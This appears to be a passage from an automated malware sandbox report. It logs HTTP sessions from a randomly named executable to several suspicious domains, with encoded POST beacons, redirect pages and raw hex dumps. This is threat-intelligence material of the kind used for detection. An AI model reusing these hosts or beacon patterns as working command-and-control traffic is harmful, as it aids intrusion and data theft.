                                                                                                                                                            Data Ascii: mnYxMt=nElwp91d2c4kZcj2y3ToBhLl27KLv/GmhllWowVCW+Dwgk68+9+uDYQftriIzZRPFlyfEbvcFm1H4+D56//I0V0WVXAvOueXff7iWbkwJPxwj2CUARgq7HZ9sQYJXNSyHA2S948ABYdwROHyoNMMP170zwl3vZVwzRqHySPoMtsgOBuLDTu+qpM4eoVFAGBQ0Uv1BRxlS/1zwMw6buQdwuuRx5/vg88jhA9iqufXglFQCAdgV75y6vbgxxxv/seMvVoNyHUGkV3kZz6sI/ASsB8BIzrWkEl7j0ZVY1NicZGjKzaV4p5DA9bFhJ/htfAs/1GwLSwBhYs8KqGE+MCO2fDtdfK7O876gDHr3F2lM0EnAgrCzHvkaxD9dpFfUkGZkMpHDGe5zIeaeo9v798oMZ/w9oSoY3Uueh2Yt3JlMeC7k/aQKRjLAizEk4hMRbZDY8P9aUz/KrBuQ5UxQyXIG1Ob0EBHw8yQ9GjQRQtEZc0O2AdAx1xmPlHbZ2/vtscBuWDq324LF91Ld1Omhg1R9ahMIwv1bAffxF1aRTs0TuZOCkEvgjuXHjH3tRpN96nLSXJ/008qyRUPL6RklvATc4xPaJ1FS1LrV0JGce/MVcISPpyWRTDtVaragdIQwQ068Nvgq8ndIxpajrmfUYwn1qBJc50vM3Zw/y35KdRzkubiYqzGpU8YaTn+cr1Ox9TF0klzfvD1HtlLBqiL8o9lJlMueUW2Yg/PXYolNq2EZ8wOotRK8SnqxXpC92Xu2Lkd/A8jDUp17F43zKaJFk7SGbnUaoRIlJuNcbAy2+yxcMs57wXbymvsyQ+enWNFWOexV3oSrd0+Uu91ngickjNqnjbLOsxpersQHw1IPHOTYsf8dDPo8iPWYbltRG+zMc0stB3xzIrlLgyQ8dvK61Hs1QQ1pzrH0MHSI2ckhak2PEzaCsEBYBaUpaPP5FdtL7Ib0cDUkRgsrddkmIR+z84gaTQja0kqZV1PY+fL+XM64oevO [TRUNCATED]


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.8497173.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:07.121895075 CET539OUTGET /lclg/?mnYxMt=qGNQqN428OgBR9iLlEb4WGf8+MyTqJq+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkFANGX4pZoX9Su7sNqFMId0FgDeuDTQ2y3FSwAk0Ntj9dQ==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.filelabel.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:34:07.739193916 CET410INHTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:07 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 6e 59 78 4d 74 3d 71 47 4e 51 71 4e 34 32 38 4f 67 42 52 39 69 4c 6c 45 62 34 57 47 66 38 2b 4d 79 54 71 4a 71 2b 69 31 4a 39 70 78 56 66 5a 38 4b 2b 75 77 6d 72 38 38 2b 31 61 74 70 4d 72 61 36 74 6e 49 6c 4c 4f 6a 53 35 49 2b 37 66 65 45 74 66 69 2f 4f 6d 77 76 2f 72 6b 46 41 4e 47 58 34 70 5a 6f 58 39 53 75 37 73 4e 71 46 4d 49 64 30 46 67 44 65 75 44 54 51 32 79 33 46 53 77 41 6b 30 4e 74 6a 39 64 51 3d 3d 26 54 54 64 3d 79 52 4e 50 5a 42 55 38 66 5a 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mnYxMt=qGNQqN428OgBR9iLlEb4WGf8+MyTqJq+i1J9pxVfZ8K+uwmr88+1atpMra6tnIlLOjS5I+7feEtfi/Omwv/rkFANGX4pZoX9Su7sNqFMId0FgDeuDTQ2y3FSwAk0Ntj9dQ==&TTd=yRNPZBU8fZA"}</script></head></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.8497193.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:21.022697926 CET824OUTPOST /ou1g/ HTTP/1.1
                                                                                                                                                            Host: www.multileveltravel.world
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.multileveltravel.world
                                                                                                                                                            Referer: http://www.multileveltravel.world/ou1g/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 6b 34 6e 65 47 55 35 4c 72 2f 48 45 2b 64 51 6f 70 4a 4a 67 59 73 6d 76 50 56 62 43 62 38 67 4e 53 35 49 78 2f 73 32 59 32 6c 37 31 31 58 2b 6d 4f 72 65 68 61 58 55 66 68 47 6c 67 78 74 34 57 45 41 45 79 4e 62 63 42 73 66 6e 6f 73 62 41 48 72 35 59 37 73 44 71 64 58 45 72 69 68 59 45 7a 43 75 45 34 51 4d 76 36 62 30 62 68 32 44 2b 56 79 6d 79 77 39 79 68 7a 6d 4c 55 6d 47 46 68 66 72 55 67 78 75 58 41 69 6e 36 4f 78 34 4d 52 42 6c 52 73 47 56 6f 6d 59 61 54 73 50 54 68 45 71 32 53 78 59 39 56 69 4c 4c 4b 59 38 4d 32 35 6e 5a 6f 58 56 32 55 77 46 6b 32 6d 64 39 76 45 64 32 53 66 35 62 6d 45 3d
                                                                                                                                                            Data Ascii: mnYxMt=k4neGU5Lr/HE+dQopJJgYsmvPVbCb8gNS5Ix/s2Y2l711X+mOrehaXUfhGlgxt4WEAEyNbcBsfnosbAHr5Y7sDqdXErihYEzCuE4QMv6b0bh2D+Vymyw9yhzmLUmGFhfrUgxuXAin6Ox4MRBlRsGVomYaTsPThEq2SxY9ViLLKY8M25nZoXV2UwFk2md9vEd2Sf5bmE=


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            6192.168.2.8497203.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:23.683288097 CET844OUTPOST /ou1g/ HTTP/1.1
                                                                                                                                                            Host: www.multileveltravel.world
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.multileveltravel.world
                                                                                                                                                            Referer: http://www.multileveltravel.world/ou1g/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 6b 34 6e 65 47 55 35 4c 72 2f 48 45 38 39 67 6f 76 72 68 67 4e 38 6d 73 46 31 62 43 4a 38 67 4a 53 35 55 78 2f 74 79 49 33 54 54 31 31 31 6d 6d 50 70 32 68 62 58 55 66 70 6d 6c 76 38 4e 34 64 45 41 4a 53 4e 61 67 42 73 66 7a 6f 73 62 77 48 6f 4b 77 34 74 54 71 66 4d 30 72 73 38 6f 45 7a 43 75 45 34 51 4d 72 63 62 33 72 68 32 7a 4f 56 7a 45 4b 7a 30 53 68 77 6c 4c 55 6d 43 46 68 54 72 55 67 54 75 55 46 31 6e 34 47 78 34 4e 68 42 6b 41 73 46 4d 59 6d 65 45 54 73 59 54 41 46 63 2b 6a 4a 62 7a 6a 37 70 4c 49 63 6e 41 67 55 4e 44 4b 66 54 31 55 59 75 6b 31 4f 72 34 59 5a 31 73 78 50 4a 46 78 53 6c 68 4e 41 48 35 77 6a 47 39 6f 4c 34 55 2f 6c 45 56 6d 33 32
                                                                                                                                                            Data Ascii: mnYxMt=k4neGU5Lr/HE89govrhgN8msF1bCJ8gJS5Ux/tyI3TT111mmPp2hbXUfpmlv8N4dEAJSNagBsfzosbwHoKw4tTqfM0rs8oEzCuE4QMrcb3rh2zOVzEKz0ShwlLUmCFhTrUgTuUF1n4Gx4NhBkAsFMYmeETsYTAFc+jJbzj7pLIcnAgUNDKfT1UYuk1Or4YZ1sxPJFxSlhNAH5wjG9oL4U/lEVm32


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            7192.168.2.8497213.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:26.393382072 CET1861OUTPOST /ou1g/ HTTP/1.1
                                                                                                                                                            Host: www.multileveltravel.world
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.multileveltravel.world
                                                                                                                                                            Referer: http://www.multileveltravel.world/ou1g/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 6b 34 6e 65 47 55 35 4c 72 2f 48 45 38 39 67 6f 76 72 68 67 4e 38 6d 73 46 31 62 43 4a 38 67 4a 53 35 55 78 2f 74 79 49 33 54 62 31 31 41 79 6d 50 50 2b 68 4a 6e 55 66 71 6d 6c 2f 38 4e 34 4d 45 41 42 65 4e 61 73 52 73 63 4c 6f 39 4a 34 48 74 37 77 34 34 44 71 66 45 55 72 68 68 59 45 44 43 75 55 38 51 4d 37 63 62 33 72 68 32 78 57 56 6a 6d 79 7a 79 53 68 7a 6d 4c 55 71 47 46 68 2f 72 55 6f 35 75 58 6f 49 6d 4d 79 78 34 74 78 42 70 53 45 46 54 6f 6d 63 51 7a 74 64 54 46 64 50 2b 6a 6c 68 7a 6a 6d 45 4c 4b 63 6e 44 6d 46 37 48 5a 50 76 30 43 63 41 71 56 54 4c 30 62 70 49 6c 77 6e 6f 5a 43 2b 65 67 4b 77 66 73 6a 43 4e 30 35 75 69 43 35 41 57 48 41 69 6f 6d 32 49 67 43 52 61 2f 6a 53 4f 63 7a 47 32 34 43 46 66 6b 30 4d 72 69 69 46 6f 78 55 4c 77 43 77 55 6a 46 78 2b 64 61 57 64 78 4e 70 6c 77 66 6f 4a 2b 6c 38 32 55 58 53 77 42 79 58 79 47 53 43 41 4a 69 4a 31 37 42 49 59 4a 39 4c 43 58 6e 32 59 59 53 6d 79 73 7a 4f 72 66 30 48 6c 75 4f 7a 79 36 6b 6c 35 71 35 77 7a 46 7a 75 4b 59 [TRUNCATED]
                                                                                                                                                            Data Ascii: mnYxMt=k4neGU5Lr/HE89govrhgN8msF1bCJ8gJS5Ux/tyI3Tb11AymPP+hJnUfqml/8N4MEABeNasRscLo9J4Ht7w44DqfEUrhhYEDCuU8QM7cb3rh2xWVjmyzyShzmLUqGFh/rUo5uXoImMyx4txBpSEFTomcQztdTFdP+jlhzjmELKcnDmF7HZPv0CcAqVTL0bpIlwnoZC+egKwfsjCN05uiC5AWHAiom2IgCRa/jSOczG24CFfk0MriiFoxULwCwUjFx+daWdxNplwfoJ+l82UXSwByXyGSCAJiJ17BIYJ9LCXn2YYSmyszOrf0HluOzy6kl5q5wzFzuKYOnYRD9TRyPERyDwmkpDqiiultG5QY3CeBa2nluX70FVEU947Cy6fkqLnzbulATEOjD60jW547tD5Wex/99RyH/+GhKaP7Y3l+PpS13gOEtr2NxcaVZ1/zWx51rnVM0pm9gdyNqWbO37zz4tu3Q8xr+OQpqEqFf4WkP5hjgMB9wytIud+9Hwhb3X8YRkJOijD36hzJiI0wPSd9nOzgiqFRiXWjxQjFRgKOhiAI8hCwvmkBdPR3RBkvpvSEp5nb9a/pY9fYlHvSu54eB14eqGJejl8tTu7XcuGH6RDkdysQLhjFsgWxnhuWUzQuvKXWHZI28EVAD3/fSRKdfEAkBEkcmzQkWow2T7QjAaGQArzkCERd94Dnha2X8t52e32L7D1Ua+8bOlSKzvdgQNTUF4fjByQtvmIAxxBLfDz9DQVaJQ3zhow3TuIhA5xDZ1bVPq4YWMrdnu6LV9lPKpgF3MVINoy5xiwFdHxMRbI/o0e1pBskGGxDwzVCjk6ysK+s4K9N7HY+asWymoKPOvpwGluNIYggxagB0oXGhdbiv3PsiLfvs1r1qVAUhFaNl9/LhvOv74ewWCy+1AAnf6HaaGPHjIFjxtqJhhQGiE4fFxc/cLGUc5K3qFA3IKqDCaTA3Q8TY16uwvOtRnMC9onowcaGnj4Lbxu0jCiqH [TRUNCATED]


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            8192.168.2.8497223.33.130.190806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:28.934596062 CET547OUTGET /ou1g/?mnYxMt=p6P+FgoGiP/G4Ng3oYlXbImlMlvFFtomc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4jq6HSjjn+IbLc0VRvScSlPe00C22kG27m5w2cAUdRcq5A==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.multileveltravel.world
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Nov 12, 2024 18:34:30.596894979 CET410INHTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:30 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 6e 59 78 4d 74 3d 70 36 50 2b 46 67 6f 47 69 50 2f 47 34 4e 67 33 6f 59 6c 58 62 49 6d 6c 4d 6c 76 46 46 74 6f 6d 63 34 42 31 34 66 53 34 77 45 33 43 30 30 6d 41 50 72 69 79 44 6d 64 6b 6a 6b 41 6c 31 4d 77 69 4b 6d 52 34 59 63 55 39 79 2b 48 6e 6c 36 4d 39 6c 6f 67 72 34 6a 71 36 48 53 6a 6a 6e 2b 49 62 4c 63 30 56 52 76 53 63 53 6c 50 65 30 30 43 32 32 6b 47 32 37 6d 35 77 32 63 41 55 64 52 63 71 35 41 3d 3d 26 54 54 64 3d 79 52 4e 50 5a 42 55 38 66 5a 41 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mnYxMt=p6P+FgoGiP/G4Ng3oYlXbImlMlvFFtomc4B14fS4wE3C00mAPriyDmdkjkAl1MwiKmR4YcU9y+Hnl6M9logr4jq6HSjjn+IbLc0VRvScSlPe00C22kG27m5w2cAUdRcq5A==&TTd=yRNPZBU8fZA"}</script></head></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            9192.168.2.849747206.119.82.134806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:36.419838905 CET785OUTPOST /xqel/ HTTP/1.1
                                                                                                                                                            Host: www.40wxd.top
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.40wxd.top
                                                                                                                                                            Referer: http://www.40wxd.top/xqel/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 69 74 43 6a 45 30 78 7a 32 78 6b 49 54 6e 30 58 33 52 72 6f 74 34 62 77 48 68 62 39 59 41 75 4c 30 63 58 38 73 73 70 72 72 2f 63 61 38 37 51 41 45 4b 6f 67 31 57 2f 57 4e 51 42 33 53 37 65 6b 69 56 62 54 46 58 42 46 68 2b 6c 32 46 78 38 34 53 47 2b 52 52 42 4d 7a 62 41 35 67 43 7a 4d 65 30 4c 63 7a 58 44 33 52 46 55 57 77 2f 69 36 33 30 48 79 65 7a 35 4d 46 46 78 71 2b 41 6e 32 39 54 37 2b 54 78 31 5a 4f 70 6c 79 30 39 6f 54 77 6b 77 49 71 2f 64 36 51 35 30 6f 50 7a 65 33 74 67 6c 4c 47 51 55 30 33 54 64 32 78 45 62 45 39 31 2b 34 42 4d 42 74 78 37 51 2f 4d 6a 69 62 32 39 50 30 71 4c 45 30 3d
                                                                                                                                                            Data Ascii: mnYxMt=itCjE0xz2xkITn0X3Rrot4bwHhb9YAuL0cX8ssprr/ca87QAEKog1W/WNQB3S7ekiVbTFXBFh+l2Fx84SG+RRBMzbA5gCzMe0LczXD3RFUWw/i630Hyez5MFFxq+An29T7+Tx1ZOply09oTwkwIq/d6Q50oPze3tglLGQU03Td2xEbE91+4BMBtx7Q/Mjib29P0qLE0=
                                                                                                                                                            Nov 12, 2024 18:34:37.356420994 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:37 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            10192.168.2.849762206.119.82.134806320C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Nov 12, 2024 18:34:38.971611977 CET805OUTPOST /xqel/ HTTP/1.1
                                                                                                                                                            Host: www.40wxd.top
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.40wxd.top
                                                                                                                                                            Referer: http://www.40wxd.top/xqel/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Raw: 6d 6e 59 78 4d 74 3d 69 74 43 6a 45 30 78 7a 32 78 6b 49 53 47 45 58 6b 32 48 6f 39 6f 62 2f 4d 42 62 39 53 67 76 43 30 63 62 38 73 74 74 37 6f 4e 34 61 39 62 41 41 57 59 41 67 67 57 2f 57 59 67 42 32 59 62 65 74 69 56 66 68 46 57 74 46 68 2b 68 32 46 77 4d 34 54 31 57 51 54 52 4d 78 52 51 35 6d 4d 54 4d 65 30 4c 63 7a 58 44 7a 72 46 55 4f 77 2f 53 4b 33 37 47 79 64 74 4a 4d 47 53 42 71 2b 58 58 32 68 54 37 2b 78 78 78 51 6a 70 6e 4b 30 39 73 66 77 6b 68 49 6c 78 64 37 56 6e 45 6f 64 2b 2f 32 63 75 33 62 30 52 31 4d 4e 4e 4e 6d 77 42 74 70 58 76 63 77 48 50 42 46 61 37 54 58 36 6d 56 47 65 6e 73 6b 61 56 54 68 65 73 79 4c 35 32 36 68 72 72 57 58 52 77 66 4f 61 52 43 51 74
                                                                                                                                                            Data Ascii: mnYxMt=itCjE0xz2xkISGEXk2Ho9ob/MBb9SgvC0cb8stt7oN4a9bAAWYAggW/WYgB2YbetiVfhFWtFh+h2FwM4T1WQTRMxRQ5mMTMe0LczXDzrFUOw/SK37GydtJMGSBq+XX2hT7+xxxQjpnK09sfwkhIlxd7VnEod+/2cu3b0R1MNNNmwBtpXvcwHPBFa7TX6mVGenskaVThesyL526hrrWXRwfOaRCQt
                                                                                                                                                            Nov 12, 2024 18:34:40.719484091 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:39 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                            Nov 12, 2024 18:34:40.727097034 CET691INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:34:39 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
